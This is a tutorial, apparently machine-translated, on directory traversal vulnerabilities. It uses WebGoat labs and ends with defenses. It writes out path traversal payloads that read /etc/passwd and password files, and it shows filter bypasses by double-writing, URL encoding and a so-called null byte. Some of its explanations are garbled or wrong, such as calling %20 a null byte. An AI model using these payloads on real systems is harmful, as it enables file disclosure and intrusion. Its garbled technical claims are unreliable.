full grasp of directory traversal vulnerabilities from 0 to 1
0x01 what is a directory traversal vulnerability
the directory traversal vulnerability is due to a configuration defect in the website, which causes the website directory to be browsed arbitrarily, which will lead to the leakage of many private files and directories of the website.
for example, database backup files, configuration files, etc., attackers can use this information to prepare for further intrusion into the website.
In simple terms, I personally think of directory traversal as more of a trick, a trick that can be used with other attacks, using more than CSRF and CORS.
As early as the earliest contact with the directory blasting tools in dirb, Royal Sword, and Burpsuite, if you can sweep out some existential/surviving directories, it is actually a kind of directory traversal vulnerability.
- all in all, directory traversal of this loophole requires frequent touch and probe.
- where resources exist, directory traversal is highly likely.
0x02 several directory traversal attack vectors
One point to be particularly clear is that directory traversal attacks are based on the operating system. Based on the operating system, such as the Linux operating system, the command is to return to the previous directory.
cd ..
../this command runs through the entire directory traversal attack and is also the core of the directory traversal attack.
If the other server is Linux, the attack method is through, and this one will traverse the attack throughout the entire directory.
../../
1. exploit directory traversal vulnerability in file upload
Range address: WebGoat range, table of contents under PageLesson2
- the title briefly describes the exploit of directory traversal vulnerabilities through file upload
range interface
- for the requirements of the topic, let’s talk about uploading pictures to non-this directory.
- The directory to be uploaded is: /PathTraversal/user/tests, and we can upload the images to other directories through directory traversal.
Already os-for Linux, so use to complete directory traversal attacks,../
Using Burpsuite grab packets, change “test” to “:. /test”, which is the directory one level above the /test directory.
As shown in the figure, the avatar is uploaded to the /PathTraversal/user directory.
【1> all resources to obtain < 1】1、network security learning route 2、e-book (white hat)3、internal video of the security manufacturer 4、100 src documents 5、common security interview questions 6、ctf contest classic question analysis 7、full set of toolkit 8、emergency response notes.][1]1.1
2. perform a directory traversal attack on resource points that exist on the site
- resource points that exist on the website: resources such as pictures, try to traverse the catalog while requesting the picture.
for example, the directory where the image resource is located:
127.0.0.1/home/image
copy the code
and there is a file named 127.0.0.1/home.password.txt
image gets the parameters through a GET request, so the url to get the image is.
127.0.0.1/home/image?filename=1.jpg
copy the code
of course, the /home root certainly doesn’t flow out. at this point, if we turn the filename request into, the request becomes../1.jpg
127.0.0.1/home/image?filename=../1.jpg
copy the code
directly access to the /home directory, so at this point, if we reconstruct the request, it is not so simple, the request becomesfilename=../password.txt
127.0.0.1/home/image?filename=../password.txt
copy the code
next, we will drill down a bit through a range to traverse the existing resource points
range address: directory traversal of existing resource points
- the range asked us to get the /etc/passwd file
the range interface is shown in the figure
GRAB THE PACKAGE AND CLICK ON THE IMAGE TO GET A GET REQUEST FOR THE IMAGE. AND DIRECTLY START OUR DIRECTORY TRAVERSAL ATTACK.
the directory traversal attack was successful, and the return was 400, indicating that the server background did not make any restrictions on the directory traversal attack, but did not request resources, and then try to go up to the next level. that is. also failed, don’t worry, keep trying.../../
finally succeeded on the third floor! it’s not easy…
The /etc/passwd file itself is a very important file in Linux
We can actually appreciate the exploitability of vulnerabilities through screenshots, very many, light information leakage, heavy Getshell.
3. For Zip files, in file upload, you can replace avatar upload and use directory traversal
- The scene is applied to the file upload interface, but it is also a very special point. Long before, when people didn’t pay much attention to this situation, Zip files could be uploaded as files.
- An attacker can use this to change where a file in a Zip package is stored.
../
obviously, it is also the part of the file upload, but it must also be pulled out separately and said
After the Zip file is extracted, under the attacker’s elaborate design, it is very likely to overwrite the original file on the server. For example, the .htacess file in PHP is the most famous file upload overwrite, if you overwrite the .htacess file, it will be a big problem
0x03 directory traversal bypasses common defenses
1. defense against simple directory traversal../
when the server background filters, such as this code../
return super.execute(file, fullName != null ? fullName.replace("../", "") : "");
copy the code
at this point, because the input is processed, it is replaced with a space.../
then we bypass it by double-write, that is, input, and it will be parsed to ==” successfully bypass ~..././../
Range address: WebGoat Path Traversal PageLesson3
- the source code of the general means of defense is shown in the figure
the bypass is shown in the figure
2. THE GET REQUEST PARAMETER IS NOT ALLOWED TO EXIST WITH../
recall the previous example: a directory traversal attack on a resource point that exists on a website.
AT THIS POINT, WE REQUEST RESOURCES THROUGH THE PARAMETERS IN THE GET REQUEST, IF THE PARAMETERS DO NOT ALLOW THE PRESENCE OF AND, IT IS MORE DIFFICULT TO CARRY OUT DIRECTORY TRAVERSAL ATTACKS, BUT THERE IS ALWAYS A WAY TO BYPASS ~../
- principle: after the server background gets the value of our parameter, it will do a url encoding, if you just filter the parameter, you can bypass it through url encoding.
- payload
?filename=%2e%2e%2f/etc/passwd
copy the code
%2e%2e ——> .. %2f ——> /
This can be done around. For specific ranges, see WebGoat Path Traversal PageLesson5.
- the source code for the defense is shown in the figure
bypassed using url encoding,
3. when the server only allows resources in the current format to be obtained
- scenario: if the resource is an image at this point, the server only allows requests that are. only can it be requested.
?filename=图片格式的后缀?filename=1.jpg - bypass: null byte bypass
the original payload
?filename=../etc/passwd
copy the code
because the server is limiting the requested resources, an error is bound to be reported at this time.
null byte bypass, that is, space is added, because the content after the space is automatically filtered. the space corresponds to the hex encoding of %20, so we construct a new payload.
?filename=../etc/passwd%201.jpg<!--转换一下,也就是-->?filename=../etc/passwd 1.jpg
copy the code
in the case of a null byte, the content after the space is directly commented out, and this becomes the case.
?filename=../etc/passwd
copy the code
BYPASS THE IMPLEMENTATION OF GET ~ !
0x04 the ultimate defense against directory traversal
- earlier talked about some of the simple defense methods of directory traversal, and it is not top-notch, next we introduce a method that can well defend against directory traversal.
1. restrict the path entered by the user to a certain range.
2. standardize all characters
when the user requests access to a file/directory, all characters are directly normalized and all characters are converted to url encoding, after doing so, they will not be parsed into the server’s hands, and there will be no directory traversal.../
3. verify that the user’s input is in the whitelist
that is, to limit the user to request resources, for a small number of files (such as images), write regular expressions to batch specification request resources whitelist, so that you can do a perfect defense against directory traversal vulnerabilities.